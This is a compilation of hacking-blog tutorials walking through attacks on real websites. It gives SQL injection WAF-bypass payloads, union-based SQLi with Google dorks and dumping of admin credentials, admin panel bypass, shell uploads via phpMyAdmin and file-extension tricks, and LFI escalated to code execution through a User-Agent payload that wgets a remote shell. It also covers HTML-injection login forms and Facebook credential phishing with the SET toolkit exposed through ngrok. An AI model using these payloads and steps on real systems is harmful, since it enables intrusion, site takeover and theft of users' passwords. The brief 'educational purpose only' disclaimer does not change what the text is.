Sql Injection – Inject A Site When Commas Are Blocked

Inject A Site When Commas Are Blocked

In this tutorial I will show you how to Inject a site when commas are blocked. Injecting a site when commas are blocked is too easy.

There are many methods to bypass commas in sql injection.

# Method 1

By putting , in comment like

union select 1/*!,*/ 2/*!,*/ 3

OR

union select 1/*,*/ 2/*,*/ 3

# Method 2

We can use CHAR(44). CHAR value is the Ascii value of Comma. After regular commas are strip out by WAF those as CHAR may remains.

union select 1,CHAR(44), 2,CHAR(44), 3

# Method 3

We can use command join.

(select 1)a join (select 2)b join (select 3)c

# Method 4

Escaped-encoding/URL encoding (or sometimes referred to as percent-encoding) is a method of representing characters within an URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. It consists of the percentage character % followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a comma with octet code 44, or hexadecimal 2C. Thus its URL-encoded representation is %2C.

union select 1%2C 2%2C 3

# Method 5

we can replace the comma with %82.

union select 1%82 2%82 3

# Method 6

Sometimes this basic URL-encoding attack might not work, however you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded attack the % character in the original command is itself URL-encoded in the normal way (as %25) so that the double-URL-encoded value of comma (%2C) is %252C.

union select 1%252C 2%252C 3

Thanks for reading guys. Now my next tutorial will be on bypassing white spaces. keep sharing and learning 🙂

Bypass The Admin Panel Using No Redirection

Bypass The Admin Panel Using No Redirection

In this post I will show you how you can bypass the admin panel using no redirection. Today almost 60% websites are bypassable using no redirection.

Pre-requisite:

  • Mozilla Firefox
  • No redirect Addon
  • Brain 😉

What an attacker can do ?

  • An attacker can bypass admin panel and access the admin panel using this addon.
  • An attacker can make changes in site.
  • An attacker can shell the site.

so lets come to work..

  • Download and install the no redirection addon. If you don’t have get it from here.
  • Open the admin panel of targeted website.

For example: http://vuln-web.com/admin/index.php

  • Now we will guess the file name in folder to directly request the page if you cannot guess then you can spider a whole site and can perform this.
http://vuln-web.com/admin/index.php        (same Login Page)
http://vuln-web.com/admin/login.php        (Error, Page Not Found)
http://vuln-web.com/admin/home.php         (Error, Page Not Found)
http://vuln-web.com/admin/welcome.php      (Error, Page Not Found)
http://vuln-web.com/admin/dashboard.php    (Error, Page Not Found)
http://vuln-web.com/admin/default.php      (Error, Page Not Found)
http://vuln-web.com/admin/admin.php        (Redirected to index page )
  • The http://vuln-web.com/admin/admin.php redirects to index page that means this is present in the site so now we will directly request this page.
  • For directly request I will block the redirection using no redirect so just open your No redirection Addon by pressing ‘ alt ‘ key.
  • Add the admin panel URL in the addon.
 example: http://vuln-web.com/admin/
  • After adding now request the page admin.php. this time no redirection takes place because we blocked the redirection using no redirect addon.

Done, The only thing you need to do is guessing the files in admin folder. if not found any page spider or crawl the site and request the page.

Thanks for reading guys, keep sharing and practise.

Shell Uploading Via Phpmyadmin

Shell Uploading Via Phpmyadmin

In this tutorial I will show you Shell Uploading Via Phpmyadmin step by step. For those who know this trick i am sorry for that but there are my many friends who don’t know this trick.

Phpmyadmin should be protected with passwords but still there are some website which doesn’t use password in phpmyadmin.

  • First we must know the path of document root like phpinfo.php .
  • Now we will go to phpmyadmin and will create a database.

I have created a database name shell. just create a database with your desired name.

  • After creating a database just click on database and then go to structure and and create a table with 1 column and after clicking on go enter name select type to text.

shell uploading via phpmyadmin

  • Then go to insert and paste your uploader code and click on go.

shell uploading via phpmyadmin

  • Now go to table in database and go to SQL tab and Insert this query.

 shell uploading via phpmyadmin

SELECT * FROM shell INTO OUTFILE 'C://wamp//www//shell//shell.php
  • Yeah we have uploaded our uploader from phpmyadmin now just go to the desired location and upload your shell. 😉

Post Parameter SQL Injection With Live HTTP Header

Post Parameter SQL Injection With Live HTTP Header

Hello every in this session I will show you the post parameter sql injection with live Header so read carefully. For This Injection you will need an addon in firefox called Live Http Header

Be Patient while Reading 😉

Code:
index.php?detailrecid=4
or
index.php?maincat_id=1&subcat_id=17
When we add single quote ‘ to test vulnerability web content is changed – we get empty page or Mysql error. Usually this is good and shows us SQLi vulnerability. But in this tutorial we will not do anything with usual procedures to find column number with order by/group by using those links.

 

So Lets Go to page as shown below with music (red ellipse on picture bellow).

code

index.php?maincat_id=1

There are many songs and three buttons (links) for every song (red square on picture bellow).

Post Parameter SQL Injection

we go with mouse over first button in red square (Licence) we get a hint in lower left corner of Firefox about URL we will visit if we will click on it.

code

www.<our_site_in_challenge>.com/license.php

Same is true if we go with mouse over third button (Demo)

Code:

www.<our_site_in_challenge.com>/demos/music/jacosm/ambience-deluxe.mp3

BUT if we go with mouse over second button in red square on picture above (Download) we don’t get that hint any more. We don’t see URL to be visited if we would click on that button (as with other two buttons)

Why it happens ? 

We all know HTTP protocol (by HTTP/1.1 specification) supports different request methods like: GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE and CONNECT. We are using most of the time GET and POST requests.

Ok, Now Start a Live Http Header and you will get a dialogue.

Post Parameter SQL Injection

Make sure that capture button is checked and if there is some http header in so click con clear button we will start with empty state.

After clicking on button Download our Live HTTP Headers dialog is changed as it captured request sent to server. It will looks like

Post Parameter SQL Injection

From the above picture we can see in first red square it was really POST request as we assumed. From second red square we can see what parameters were sent to server.

We couldn’t see them until we intercept them with Live HTTP Headers (or from web page HTML source code). BTW check box Capture (red ellipse on picture above) can be unchecked now as we don’t want to capture further request(s).

Let’s click on first line in Live HTTP Headers above POST section data (http://www.<our_site_in_challenge>.com/index.php) and then on button Replay in lower left corner of dialog (picture above).

we got a new dialogue

Post Parameter SQL Injection

Look in POST Content section of dialog (red ellipse on picture above)*** There are parameters we can modify.
Now we can use our usual SQLi strategies to test vulnerability, find columns count.****** and prepare our command to inject. In ellipse (picture above) we can see. I already added [b]’ after recid parameter. When I click on button Replay (right lower corner of dialog) our modified command is sent to server and in Firefox we can follow result from it:[/b]

Post Parameter SQL Injection

So recipe after we came to here is easy: modify command in red ellipse further to prepare your SQLi command. After modification just press button Replay again to send it to server. BTW site in this challenge can be injected with union select based or error based SQLi.

I think you enjoyed this Post Parameter SQL Injection tutorial. Keep practising and learning.

Shell Uploading Via Tamper Data

Shell Uploading Via Tamper Data

In this session we will discuss about shell uploading via tamper Data or shell uploading bypass method. During hacking you got successfully login to admin panel where they ask you for uploading image in .jpg and .png extension but you are not able to upload shell then read this tutorial carefully step by step.

In this tutorial we will bypass from unrestricted files upload using jpg extension so lets start our work.

  • Go to your desired location to upload files and rename your shell with .php.jpg extension like shell.php to shell.php.jpg as shown below.

Shell Uploading Via Tamper Data

  • Now just click on tools>Tamper Data>start tamper and click on upload.
  • Now tamper your page and in Post data find your file and rename shell.php.jpg to shell.php and then click ok.

Shell Uploading Via Tamper Data

  • Now your shell is successfully uploaded just access your shell.

Shell Uploading Via Tamper Data

Advance Shell uploading bypassing Extensions

1)shell.jpg.php (satisfies as check for jpg only)
2)shell.jpg.PhP (obfuscation)

3)shell.php;.jpg (sometimes can ignore whats after “;”)

4)shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)

5)shell.php.test (defaults to first recognised extension ignoring “test”)

6)shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)

7).phtml (a commonly used php parsed extension often forgotten about!)

8).php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)

Local File Inclusion (LFI) Vulnerability Attack

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss about the local file inclusion vulnerability and how it occurs and can be patched so first let me start with introduction about file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability.

What is Local File Inclusion (LFI) vulnerability ?

The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../|

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

so we go more directories up..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

yeah we successfully included a file and our next step is to include a proc/self/environ file. so now replace /etc/passwd with /proc/self/environ file as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this that means you have successfully included a proc/self/environ file.

 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/pass wd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.vulnerablewebsite.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

Injecting a Malicious code in Local File Inclusion vulnerable website

Now let’s inject our malicious code in proc/self/environ.How we can do that? We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. after submitting you will get an uploader or /proc/self/environ page just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.shell.com/shell.txt and save it as shell.php  in the website directory) through system(), and our shell will be created.If don’t
work,try exec() because system() can be disabled on the webserver from php.ini.

Accessing our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. Injection was succesfully.

So I think every body enjoyed this tutorial keep practising and learning. 🙂

SQL injection Union Based Manually Step by Step

SQL injection Union Based Manually Step by Step

Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.

What is SQL Injection ?

SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.

What an attacker can do ?

  • An attacker can Inject in website and can read and modify database.
  • An attacker can take the control of your admin panel if you have.
  • If the targeted website is E-commerce and website store the information then attacker can easily get.
  • An attacker can shell and deface the website.

So lets start our work….

Step 1:

Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here i got the error message in order by 5 that means the total number columns are 5.

Step:4

Now we will the vulnerable column using union command

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

SQL injection manually

As you can see in the above image vulnerable column is 2 following things we will use this commands.

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we will find the table name just paste this query in vulnerable column given below.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

SQL injection Union Based ManuallyStep 6:

we will find the column names of particular table just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.

keep practising but don’t harm any site…

 

How To Access Your LocalHost Any Where

How To Access Your LocalHost Any Where

You have spent a lots of hour on your system and setting up CMS. Your CMS is Perfectly setup with Nice look and sample post and you want to test on any other mobile device and tablets also your client wants to test it out but you don’t have time to migrate to public server then you can to give them a quick demo then you can show them on your localhost itself without using webhosting you can access your localhost any where.

How is it possible to access your localhost any where ?

It is possible through a secure tunneling services such as

  1. Ngrok
  2. PageKite
  3. Forward
  4. ProxyLocal
  5. Browser Stack

These are the sevices which provide a secure tunnel from the internet to your PC. They Provide a publically access url and forward it to your localhost system.

So lets start our main work.

Here i am using ngrok you can download ngrok from their official website.

  • First Extract ngrok on your desktop.
  • Type win+r and type cmd and hit enter.
  • go to desktop using cd command.

access localhost anywhere

  • Now we will Forward port 80. Use this command to forward ngrok http 80. when you enter this command it will show a new screen in you command prompt as shown in below image. But first start your Wamp/xamp.

Access Your LocalHost Any Where

Yeah now we got a secured tunnel just open your forwarding url and you can access your localhost any where.

HTML Injection Step by Step For Begineers

HTML Injection Step by Step For Begineers

Hello guys, hope you were doing good and practising so today in this post we will discuss about HTML injection and why HTML injection is risky.

What is HTML injection ?
HTML Injection, Hyper Text Markup Language Injection is a vulnerability which allows an attacker to inject a malicious script via specific parameter. Also HTML Injection is referred as a virtual defacement of web application.

The possible attveack scenario are demonstrated below

  1. An attacker can find a vulnerability and perform HTML injection vulnerability.
  2. An attacker can do phishing from the vulnerable website and send email to victim.
  3. The user visits the page due to the trust worthy domain and can Enter User Id and password which is sent to attacker server.

So lets start ..

  1. Firstly you need to find a website which is vulnerable to HTML Injection. Here I am using bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.

Html injection

3. As you can see I add my simple <h1> ahmed </h1> code and executed. this code is executed.

4. Now lets try with some html More html tag such as bold, colour, background e.t.c.

Html injection

See the above image i have modified its look using some basic tags. You can also perform XSS attack using HTML Injection as shown in below image.

Html injection

So let’s try to create a login form using this code.

<form action=”http://127.0.0.1/login.php” method=”POST”>
Username: <input type=”text” name=”username”><br>
Password: <input type=”password” name=”pass”><br>
<input type=”submit” value=”Login”></form>

Make your any page or you can add you deface page change this code and and change you location.

<form action=”http://127.0.0.1/login.php” method=”POST”>

 

Html injection

Just login with any username and password and see what happens.

Html injection

This page is shown after login of victim 🙁 and we got successfully ID and Password.

Keep Learning.. and Injecting but don’t harm an site.

Hack Facebook Account With SET Toolkit in kali Linux

Hack Facebook Account With SET Toolkit

Welcome back guys, today in this post i am going to show you how to hack facebook account with SET tool kit. please note that social engineering toolkit doesn’t exploit any vulnerability it exploits human element of security.

You can use SET tool kit to hack facebook account or for any type of website.

Here I am using Kali Linux as an attacker machine.

so lets start our work. 🙂 and follow me step by step.

  • Just start your SET tool kit in Kali linux by using this command ” setoolkit “. Then you will get this screen as shown in image.

hack facebook account with set toolkit

  • Now press 1 and enter, here we are going to use website vectors attack and then press 3 for credential harvester method.
  • Now press 2 for site cloner and it will give you the option to add your Ip address.
  • Hack Facebook account set tool kit
  • just add your Ip address you can find you IP address by ifconfig command. Here we are going to clone a facebook.com follow these steps as shown below.

Hack Facebook account set tool kit

  • just enter all these things and press [enter].
  • Yeah, our set tool kit process is starting.
  • As I already told you SET tool kit didn’t exploit any vulnerability but it exploit humans element of security. Give you Ip address to the victim and use social engineering when he/she will open our ip address then our phishing page will open and login then you get an id password. For example i am opening attacker ip address  on my windows.

Hack Facebook account set tool kit

After login of victim the password will save in “/var/www” directory.

Note:This technique will work on only same network but if you want to access any where then you can use secure tunneling on port number 80 by using ngrok, pagekite e.t.c

please Don’t try for illegal purposes this is for educational purpose only. If anything happens than I am not responsible.